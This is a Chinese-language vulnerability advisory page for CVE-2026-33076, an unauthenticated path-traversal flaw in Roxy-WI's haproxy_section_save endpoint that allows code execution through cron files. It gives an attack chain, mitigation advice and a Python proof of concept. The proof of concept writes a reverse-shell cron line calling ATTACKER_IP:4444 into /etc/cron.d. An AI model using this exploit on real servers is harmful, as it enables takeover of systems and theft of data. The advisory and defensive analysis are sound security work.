IPBUF安全漏洞报告
English
CVE-2026-33076 CVSS 9.8 严重

CVE-2026-33076 Roxy-WI远程代码执行漏洞

披露日期: 2026-04-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33076
漏洞类型
远程代码执行 (RCE)
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Roxy-WI

相关标签

RCEPath TraversalRoxy-WICronCriticalCVE-2026-33076

漏洞概述

Roxy-WI是用于管理Haproxy、Nginx、Apache和Keepalived服务器的Web界面。在8.2.6.4版本之前,其haproxy_section_save接口存在路径遍历漏洞。攻击者无需认证即可利用该漏洞将恶意内容写入系统计划任务,从而在服务器上执行任意代码,获取系统控制权。

技术细节

该漏洞的核心问题在于Roxy-WI的`haproxy_section_save`接口未能对用户传入的路径参数进行严格的过滤和校验,导致存在路径遍历漏洞。攻击者可以通过发送特制的HTTP POST请求,利用`../`序列穿越目录限制,将包含恶意Shell命令的数据写入到服务器的计划任务文件(如crontab)中。由于系统会定期执行计划任务中的指令,攻击者写入的恶意代码最终将在服务器端以运行Roxy-WI服务的用户权限执行。鉴于该漏洞无需用户交互和身份认证,攻击者可轻易获取服务器权限,造成数据泄露或服务中断。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出使用Roxy-WI且版本低于8.2.6.4的目标服务器。
STEP 2
2. 漏洞利用
攻击者向`haproxy_section_save`接口发送特制的HTTP POST请求,利用路径遍历参数(如`../../`)定位到系统计划任务目录。
STEP 3
3. 写入恶意载荷
攻击者将包含恶意命令(如反弹Shell)的数据写入到受影响服务器的计划任务文件(如/etc/cron.d/)中。
STEP 4
4. 执行代码
等待系统定时任务调度器(Cron)加载并执行新写入的计划任务,从而在服务器端触发恶意代码。
STEP 5
5. 建立控制
恶意代码执行后,攻击者获得服务器远程访问权限,可进一步窃取数据或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-33076 # Description: Exploits path traversal in haproxy_section_save to write arbitrary data to cron jobs. # Target: Roxy-WI < 8.2.6.4 target_url = "http://target-ip:port/haproxy_section_save" # The malicious payload to write into the cron file # This example creates a simple reverse shell malicious_cron = "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" # Path traversal payload to escape the web directory path_traversal = "../../../../../../etc/cron.d/poc_exploit" data = { "path": path_traversal, "schedule": malicious_cron, "action": "save" } headers = { "User-Agent": "Mozilla/5.0 (CVE-2026-33076-Analyst)", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post(target_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully. Check your netcat listener.") else: print(f"[-] Request failed. Status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Roxy-WI < 8.2.6.4

防御指南

临时缓解措施
如果无法立即升级,建议在防火墙层面限制对Roxy-WI服务器的非必要网络访问,特别是阻断外网对管理端口的访问,并严格审查系统内的计划任务(crontab),移除任何可疑或未授权的定时任务。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表